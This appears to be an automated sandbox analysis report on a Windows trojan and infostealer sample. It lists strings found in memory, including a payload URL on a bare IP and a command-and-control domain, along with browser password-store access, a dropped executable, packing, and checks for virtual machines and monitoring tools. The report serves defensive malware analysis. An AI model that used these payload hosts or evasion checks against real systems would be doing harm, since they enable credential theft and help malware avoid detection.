Source: file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/j
Source: file.exe, file.exe, 00000000.00000002.1724361364.0000000000C7A000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724509005.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe0
Source: file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe2
Source: file.exe, 00000000.00000002.1724509005.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000D90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeR
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1566909072.0000000000E02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.s
Source: file.exe, 00000000.00000003.1581702066.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724509005.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1582388699.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724509005.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1516669230.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1566593101.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000D90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/
Source: file.exe, 00000000.00000002.1724509005.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/Hy
Source: file.exe, 00000000.00000003.1722841252.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722535596.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1582388699.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724772459.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1581573293.0000000000E02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/api
Source: file.exe, 00000000.00000003.1581573293.0000000000E02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/api/
Source: file.exe, 00000000.00000003.1593633698.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722535596.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724772459.0000000000E15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apiAE
Source: file.exe, 00000000.00000003.1593633698.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722535596.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724772459.0000000000E15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apit
Source: file.exe, 00000000.00000003.1548543584.00000000055D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/au
Source: file.exe, 00000000.00000003.1548543584.00000000055D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/e
Source: file.exe, 00000000.00000003.1516669230.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/o
Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: file.exe, 00000000.00000003.1550064219.000000000566F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: file.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: file.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49713 version: TLS 1.2

System Summary

Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.dr Static PE information: section name:
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.dr Static PE information: section name: .idata
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E195CF 0_3_00E195CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D8D9F2 0_3_00D8D9F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00DAB282 0_3_00DAB282
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00DAB2AF 0_3_00DAB2AF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087EC20 0_2_0087EC20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088104F 0_2_0088104F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00880460 0_2_00880460
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087E1A0 0_2_0087E1A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008979B0 0_2_008979B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088D7F8 0_2_0088D7F8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0089AB20 0_2_0089AB20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087F755 0_2_0087F755
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008814CE 0_2_008814CE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008930E0 0_2_008930E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008910FF 0_2_008910FF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008AB0F0 0_2_008AB0F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00875000 0_2_00875000
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088D010 0_2_0088D010
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088CC20 0_2_0088CC20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088E837 0_2_0088E837
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B5040 0_2_008B5040
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00878460 0_2_00878460
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088E07E 0_2_0088E07E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00886997 0_2_00886997
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087ADB0 0_2_0087ADB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008865D7 0_2_008865D7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008791E9 0_2_008791E9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00891100 0_2_00891100
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00876D10 0_2_00876D10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0089091E 0_2_0089091E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00873930 0_2_00873930
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088ED48 0_2_0088ED48
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087BD50 0_2_0087BD50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087DA80 0_2_0087DA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008AAE90 0_2_008AAE90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B3A90 0_2_008B3A90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00891EC5 0_2_00891EC5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00878EF0 0_2_00878EF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00873886 0_2_00873886
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00884A4C 0_2_00884A4C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088FA4F 0_2_0088FA4F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00883E45 0_2_00883E45
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087A260 0_2_0087A260
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0089CBD0 0_2_0089CBD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00879FF5 0_2_00879FF5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087A720 0_2_0087A720
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00877B67 0_2_00877B67
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0087DF60 0_2_0087DF60
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Code function: 3_2_00565966 3_2_00565966
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Code function: 3_2_006E3F65 3_2_006E3F65
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0087C890 appears 40 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0087E190 appears 76 times
Source: file.exe Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000003.1701039280.0000000005BAE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9980101391065831
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/2@2/2
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.log
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Mutant created: NULL
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000003.1517655343.00000000055D8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1533482778.0000000005675000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1517260814.00000000055F6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe "C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Section loaded: sspicli.dll
Source: file.exe Static file information: File size 2958336 > 1048576
Source: file.exe Static PE information: Raw size of jmvediaj is bigger than: 0x100000 < 0x2a6e00
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000002.1867159031.0000000000552000.00000040.00000001.01000000.00000006.sdmp, 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000003.1733973050.0000000004B70000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.870000.0.unpack :EW;.rsrc :W;.idata :W;jmvediaj:EW;famfwksn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;jmvediaj:EW;famfwksn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Unpacked PE file: 3.2.94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.550000.0.unpack :EW;.rsrc:W;.idata :W;aisygwgx:EW;pdrbgaqy:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: file.exe Static PE information: real checksum: 0x2d3a6d should be: 0x2d3c97
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.dr Static PE information: real checksum: 0x2c54ab should be: 0x2bcb13
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: jmvediaj
Source: file.exe Static PE information: section name: famfwksn
Source: file.exe Static PE information: section name: .taggant
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.dr Static PE information: section name:
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.dr Static PE information: section name: .idata
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.dr Static PE information: section name: aisygwgx
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.dr Static PE information: section name: pdrbgaqy
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D8CF4C push esp; iretd 0_3_00D8CF59
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00D8548A pushfd ; retf 0_3_00D85499
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00DABE90 pushad ; ret 0_3_00DABE95
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00DEEC9D push ebx; retf 0_3_00DEECA3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00DFCEB3 push ebx; iretd 0_3_00DFCEB5
Source: file.exe Static PE information: section name: entropy: 7.977471992304813
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.dr Static PE information: section name: entropy: 7.776956795829379
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8CF316 second address: 8CF321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FDE8C51D4D6h 0x0000000a popad 0x0000000b rdtsc
